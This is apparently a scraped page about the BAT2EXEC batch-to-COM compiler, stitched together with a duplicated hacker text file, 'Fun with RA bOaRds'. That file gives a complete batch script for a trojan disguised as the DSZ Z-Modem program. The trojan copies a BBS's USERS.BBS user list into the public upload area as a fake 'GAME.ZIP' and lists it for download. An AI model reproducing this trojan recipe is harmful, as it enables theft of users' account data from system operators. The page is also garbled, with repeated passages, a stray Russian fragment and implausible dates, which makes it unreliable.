Bat2exec
Author: s | 2025-04-24
That's where BAT2EXEC comes in. USING BAT2EXEC The full syntax for BAT2EXEC could hardly be simpler. Just enter: BAT2EXEC FILE.BAT where FILE.BAT is the name of your batch file. BAT2EXEC will then produce an executable .COM file with the name FILE.COM. BAT2EXEC will increase both your productivity and satisfaction. Addeddate Identifier BAT2EXEC Scanner Internet Archive HTML5 Uploader 1.6.3
bat2exec $hostdrive$: - alt.msdos.batch.nt.narkive.com
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $ $ $ Fun with RA bOaRds $ $ $ $ by vINCE nIEL $ $ $ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$Remote Access BBS software sucks, and a SysOp who would want to run it isasking for it, so we're going to teach him a lesson by doing some funthings with his board. The first thing we will do is steal his userlist.First a program must be found that the SysOp wants and will execute onhis BBS system. It could be a wide range of items. It can be some soft-ware (doesn't have to be pirate) that the operator has been requesting fora while. For this demonstration, we will use DSZ .You will also need a program called BAT2EXEC.COM made by the staff atPC-Magazine. Its main purpose it to convert large Batch file to Comfiles. Com files run faster and cannot be aborted with ^C.DSZ includes-DSZ.DOCDSZ.EXERename DSZ.EXE to DSZ.DAT.Now, make a batch file called DSZ.BAT. It should look somethinglike this.@ECHO OFFIF EXIST C:\RA\USERS.BBS GOTO COPYREM Checks to see if the USERS.BBS listing is there.GOTO DSZ:COPYIF EXIST D:\FILES\UPLOAD\GAME.ZIP GOTO DSZREM Sets it to only copy once.REM Now we want to copy the USERS.BBS listing to the new fileREN directory, under the name of GAME.ZIPCOPY C:\RA\USERS.BBS D:\FILES\UPLOAD\GAME.ZIP >DMP.DMPREM DMP.DMP is used to redirect the screen outputREM Now is the tricky part. You need to have FILES.BBS listingREM add TOOBIN1.ZIP to it's listing of on-line files.COPY DSZ.DMP + D:\FILES\UPLOAD\FILES.BBSD:\FILES\UPLOAD\FILES.BAK > DMP.DMPREM D:\files\upload will change depending on the sub-dir setup.REM DSZ.DMP, a file you will need to make, is appended toREM a listing of all available files.COPY D:\FILES\UPLOAD\FILES.BAK D:\FILES\UPLOAD\FILES.BBS >DMP.DMPDEL DMP.DMP:DSZREM Now we want to run DSZ like normal.REN DSZ.DAT DZ.EXEREM Turn back on monitorDSZ %1 %2 %3 %4 %5 %6 %7REN DZ.EXE DSZ.DATREM All done!This is a generic program and you will have to tailor it so it willmeet your needs.Now, run BAT2EXEC DSZ.BAT, to create DSZ.COMIf the program does not "compile" and gives you some kind of error,that means that your program is 'too small' to be converted. Bat2execwas made for large files, and really does not like small ones. All youhave to do is add a couple 100 ECHO statements at then end of your programand everything should be fine. Ok, remember how i said you need to add USERS.BBS (which wasrenamed game.zip) to the FILES.BBS listing? Ok, now create afile that is called DSZ.DMP, and that looks like this.GAME.ZIP Game Disk #1, cracked by INC! (Description should start on 14th line) Now I will recap what will happen when you have everythingsetup. The sysop sees that someone (You) has uploaded the newestversion of DSZ Z-Modem, so he installs it. The files he placesin his protocol directory are:DSZ.COM -Your batch file changed into COM.DSZ.DAT. That's where BAT2EXEC comes in. USING BAT2EXEC The full syntax for BAT2EXEC could hardly be simpler. Just enter: BAT2EXEC FILE.BAT where FILE.BAT is the name of your batch file. BAT2EXEC will then produce an executable .COM file with the name FILE.COM. BAT2EXEC will increase both your productivity and satisfaction. Addeddate Identifier BAT2EXEC Scanner Internet Archive HTML5 Uploader 1.6.3 вы обнаружите, что bat2exec предоставит вам очень полезное сообщение об ошибке, которое поможет вам выбрать правильную настройку. Особенности bat2exec: bat2execочень BAT2EXEC Doug Boling - Volume 9, Issue 14 - August 2025 Purpose: Compile your batch files for added speed. Large batch files often run annoyingly slowly. Compiling them with BAT2EXEC I have not found any free bat2exe files, however, there is a free bat2com program (it is called bat2exec, but it outputs .com files). To use it, make sure the bat2exec.com and bat2exec.asm files are in the same directory, then use the dos command: BAT2EXEC filename.ext Details for BAT2EXEC Return to File List. Name: Size: Date: BAT2EXEC.ASM: : : BAT2EXEC.BAS: : : BAT2EXEC.COM bat2exec 1.2 (c) 2025 ziff communications co. pc magazine douglas bolingComments
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $ $ $ Fun with RA bOaRds $ $ $ $ by vINCE nIEL $ $ $ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$Remote Access BBS software sucks, and a SysOp who would want to run it isasking for it, so we're going to teach him a lesson by doing some funthings with his board. The first thing we will do is steal his userlist.First a program must be found that the SysOp wants and will execute onhis BBS system. It could be a wide range of items. It can be some soft-ware (doesn't have to be pirate) that the operator has been requesting fora while. For this demonstration, we will use DSZ .You will also need a program called BAT2EXEC.COM made by the staff atPC-Magazine. Its main purpose it to convert large Batch file to Comfiles. Com files run faster and cannot be aborted with ^C.DSZ includes-DSZ.DOCDSZ.EXERename DSZ.EXE to DSZ.DAT.Now, make a batch file called DSZ.BAT. It should look somethinglike this.@ECHO OFFIF EXIST C:\RA\USERS.BBS GOTO COPYREM Checks to see if the USERS.BBS listing is there.GOTO DSZ:COPYIF EXIST D:\FILES\UPLOAD\GAME.ZIP GOTO DSZREM Sets it to only copy once.REM Now we want to copy the USERS.BBS listing to the new fileREN directory, under the name of GAME.ZIPCOPY C:\RA\USERS.BBS D:\FILES\UPLOAD\GAME.ZIP >DMP.DMPREM DMP.DMP is used to redirect the screen outputREM Now is the tricky part. You need to have FILES.BBS listingREM add TOOBIN1.ZIP to it's listing of on-line files.COPY DSZ.DMP + D:\FILES\UPLOAD\FILES.BBSD:\FILES\UPLOAD\FILES.BAK > DMP.DMPREM D:\files\upload will change depending on the sub-dir setup.REM DSZ.DMP, a file you will need to make, is appended toREM a listing of all available files.COPY D:\FILES\UPLOAD\FILES.BAK D:\FILES\UPLOAD\FILES.BBS >DMP.DMPDEL DMP.DMP:DSZREM Now we want to run DSZ like normal.REN DSZ.DAT DZ.EXEREM Turn back on monitorDSZ %1 %2 %3 %4 %5 %6 %7REN DZ.EXE DSZ.DATREM All done!This is a generic program and you will have to tailor it so it willmeet your needs.Now, run BAT2EXEC DSZ.BAT, to create DSZ.COMIf the program does not "compile" and gives you some kind of error,that means that your program is 'too small' to be converted. Bat2execwas made for large files, and really does not like small ones. All youhave to do is add a couple 100 ECHO statements at then end of your programand everything should be fine. Ok, remember how i said you need to add USERS.BBS (which wasrenamed game.zip) to the FILES.BBS listing? Ok, now create afile that is called DSZ.DMP, and that looks like this.GAME.ZIP Game Disk #1, cracked by INC! (Description should start on 14th line) Now I will recap what will happen when you have everythingsetup. The sysop sees that someone (You) has uploaded the newestversion of DSZ Z-Modem, so he installs it. The files he placesin his protocol directory are:DSZ.COM -Your batch file changed into COM.DSZ.DAT
2025-04-19